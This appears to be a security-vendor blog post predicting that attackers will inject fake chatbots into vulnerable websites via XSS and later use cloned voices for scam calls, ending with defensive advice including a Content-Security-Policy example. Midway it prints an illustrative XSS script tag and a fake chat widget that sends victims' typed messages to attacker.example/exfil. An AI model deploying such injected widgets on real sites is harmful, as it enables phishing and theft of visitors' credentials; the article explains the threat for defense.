
“Hello, I’m John. Do you need any assistance today?” a pop-up window asks, unprompted, as you browse a shopping site.

If you’ve visited an online shopping, product support, or vendor website in the last few years, you’ve probably noticed more and more ostensibly helpful chatbots popping up, ready to assist your every want and whim. If you linger on certain websites for a tad too long, a chat dialog window might appear, often accompanied by a friendly profile picture that could convince you you’re talking to a fellow human. In reality, however, you’ve likely encountered an automated chatbot the website has deployed to improve its business.

AI-powered chatbots are all the rage among businesses with an online presence these days. They’re advertised as cutting support calls by as much as 70 percent and quickly steering visitors to products they want to buy, thus increasing revenue and profits.

If you ask a chatbot a question, it gives you an answer, or at least refers you to a link where you can find one. On the surface, chatbots seem like a win/win proposition: customers resolve their questions quickly, and companies spend less time and money on human reps. That said, I think we may be traveling down a primrose path by placing too much faith in these machine-learning contraptions.

In 2019, I predict cybercriminals will turn AI chatbots against us.

2019: A new year for potentially bad chatbots

Near the end of every year, my team and I try to predict how cyber attackers will adjust their malware and digital assaults during the upcoming year. This year, we predicted an AI-driven chatbot will go rogue. Unlike many of our predictions, which are based on quantifiable trends we see in the threat landscape, this prediction was sparked by a gut feeling we got from considering the accelerated evolution of AI technology paired with cybercriminals’ history of social engineering.

I see two versions of this rogue chatbot prediction: near-term and longer-term. Let’s explore both.

In the near-term — literally, next year — we predict a malicious hacker will inject a fake text chatbot into a legitimate website to help them socially engineer visitors. Since we encounter chatbots much more regularly these days, we have become acclimated to their presence and perhaps less skeptical about them. However, the majority of websites still don’t have one, which leaves chatbots ripe for corruption by cybercriminals.

Here’s how: many websites contain web application vulnerabilities that allow hackers to inject unwanted code. According to one security company, 94 percent of websites suffer from at least one high-severity web application flaw. Cybercriminals often exploit these flaws, such as cross-site scripting (XSS), to add malicious code to otherwise legitimate and trustworthy websites. Leveraging that kind of flaw, a cybercriminal could add a rogue chatbot to a legitimate site next year.

Imagine a banking website that hasn’t already added a chatbot of its own. If that site also suffers from a web application flaw, a criminal could add a tiny line of code that launches a remote chatbot appearing to come from the bank. When a visitor asks it where to find information about loans or their account, the malicious chatbot could forward the victim to an evil drive-by download site that forces malware onto their computer. Worse yet, the rogue chatbot could socially engineer the victim into sharing banking credentials, giving the attacker access to the visitor’s account.
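To make the mechanics concrete, here’s a minimal sketch of what the remotely loaded half of such an attack might look like. Everything in it is hypothetical illustration: the attacker.example domain, the widget markup, and the endpoint names are invented, and a real payload would be far more polished.

```typescript
// Hypothetical illustration only. The XSS payload injected into the
// bank's page could be a single line, something like:
//   <script src="https://attacker.example/chatbot.js"></script>
// The sketch below imagines what that remote chatbot.js might contain.

function injectRogueChatbot(): void {
  // Draw a chat widget styled to mimic the bank's own branding.
  const widget = document.createElement("div");
  widget.innerHTML = `
    <div style="position:fixed; bottom:16px; right:16px; padding:12px;
                background:#fff; border:1px solid #ccc;">
      <p>Hello, I'm John. Do you need any assistance today?</p>
      <input id="fake-chat-input" placeholder="Ask about your account..." />
    </div>`;
  document.body.appendChild(widget);

  // Relay whatever the victim types to the attacker's server, where a
  // script (or a live human) steers the conversation toward credentials
  // or a drive-by download link.
  const input = widget.querySelector<HTMLInputElement>("#fake-chat-input");
  if (input) {
    input.addEventListener("change", () => {
      void fetch("https://attacker.example/exfil", {
        method: "POST",
        body: JSON.stringify({ message: input.value }),
      });
    });
  }
}

injectRogueChatbot();
```

The unsettling part is how small a foothold the attacker needs: one injected script tag, and the fake “chatbot” runs with the full trust of the bank’s own domain.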

Adding voice adds more dystopian potential

However, that’s only the near-term prediction; things get even more dystopian when you look ahead five years into the future. So far, we’ve only explored text-based chatbots, but as you know, voice-based digital assistants are also gaining popularity. In the next few years, you’ll be more likely to interact with chatbots verbally than through text. Nothing makes this more obvious than the rapid adoption of Siri, Alexa, Google Assistant, and Cortana.

Recently, one of these digital assistants got an upgrade that, though amazing, really exposes some dark-side potential. During 2018, Google demoed Duplex, a natural-language speech addition to Google Assistant that allows it to carry out real-world tasks, such as calling a human to set up an appointment.

Now, you’ve heard computers talk in the past, and historically that speech has fallen squarely into the uncanny valley. While it’s gotten better over time, something always seems to tip us off that we’re speaking with a machine. Yet Google’s AI-powered Duplex bucks this trend. It sounds like a person, down to using “um” for transitions. Furthermore, it can carry on a dynamic, typically human conversation, following along with digressions, pauses, and changes in topic that computers have previously struggled with. If you haven’t heard the Duplex demo, give it a listen to be both amazed and shaken.

Unfortunately, this new level of voice-enabled AI could bring rogue chatbots to the next level. If you think you’re speaking to a human, you’ll tend to be more trusting than you would with a computer program. Natural language speaking chatbots could help automate and scale cyber scams to a much greater degree.

For example, you might have heard of, or even received, a Microsoft support scam call. Someone calls you out of the blue claiming to be a Microsoft support rep, warning that they’ve seen unusual activity on your computer. They then try to coerce you into setting up a remote desktop session so they can “fix it,” when in reality they’re hijacking your computer. If you ever get such a call, hang up.

In any case, one of the few things holding this sort of phone scam back from achieving broad-scale damage has been the fact that a human cybercriminal must manually call and interact with every single victim. Imagine instead a Duplex-like AI programmed to automate this sort of call. Now cybercriminals could launch thousands of scam attempts at once. It gets worse…

Recently, researchers and companies like Lyrebird have used machine learning and AI to replicate people’s voices and video likenesses. Using as few as 30 recorded sentences, or a wealth of publicly available video, researchers and attackers alike could make a computer sound like a person you know, and control exactly what the computer chatbot says.

This might allow them to spear phish victims at scale. Imagine calls from “your boss” asking you to make wire transfers and giving you dynamic, believable answers to all your follow-up questions. While you may think twice about that $20,000 wire transfer your CEO requested via email, you’d probably react differently if you got a convincing verbal request from your so-called boss.

How to defend yourself against rogue AI chatbots

Now that you’ve imagined our “dark” future full of rogue, AI-powered chatbots, you’re probably wondering how you can avoid or take down “Skynet.” Here’s some practical advice you can use to defend against both near-term and long-term rogue chatbot attacks.

In the near-term, use security products that filter your web traffic for malicious activity. Whether it’s a network security appliance, a DNS firewall, or a host-based security suite, plenty of products automatically block known-malicious web links and IP addresses. These products keep you off malicious sites even if you accidentally click a link sent by a rogue chatbot.

If you’re a power user, I’d also recommend browser extensions like NoScript or ScriptSafe. These extensions prevent any website from running scripts until you explicitly allow them. While they take a little time to train, they give you a way to keep even legitimate sites from running malicious, injected scripts that link to external domains. In other words, they could stop a malicious chatbot injected into a legitimate site from ever loading.
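Site owners can enforce the same principle from the server side with a Content-Security-Policy header, which tells browsers to refuse scripts from any origin the site doesn’t explicitly trust. Here’s a minimal sketch using Node’s built-in http module; the policy string and page content are illustrative examples, not a complete hardening recipe.

```typescript
import * as http from "http";

const server = http.createServer((_req, res) => {
  // Example policy: only scripts served from this site's own origin
  // may run. An injected tag like
  //   <script src="https://attacker.example/chatbot.js"></script>
  // would be refused by the browser, even if an XSS flaw slipped it
  // into the page.
  res.setHeader(
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self'"
  );
  res.setHeader("Content-Type", "text/html");
  res.end("<html><body><h1>Example bank homepage</h1></body></html>");
});

server.listen(8080);
```

Neither script-blocking extensions nor CSP is a silver bullet, but each one shrinks the opening a rogue chatbot needs in order to load at all.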

For the long-term, vigilance and regulation are our best hopes. As computers become better at natural speech, even passing the Turing test, automated social engineering attack campaigns will explode. This means we will have to get more alert and skeptical when we speak to new “people,” otherwise we might not realize we’re falling for a computer-driven scam.

On top of that, governments will have to enact new laws that force “robots” to announce themselves before speaking with humans. During Google’s first Duplex demo, the voice AI did not identify itself, and you could tell the human on the other end was totally unaware they were speaking to a computer. During a second demo, however, the AI assistant did identify itself, likely in response to the backlash from the first demo and to new laws like the one in California that requires bots to identify themselves.

The AI development and natural language speech improvements this prediction is based upon are innovative and exciting, and I look forward to the continued evolution of voice-controlled and responsive machines. However, like all technology, chatbots offer an equal opportunity for good and evil. You shouldn’t fear AI-powered chatbots, but you should keep a skeptical eye on them, in case they go rogue in the coming year.
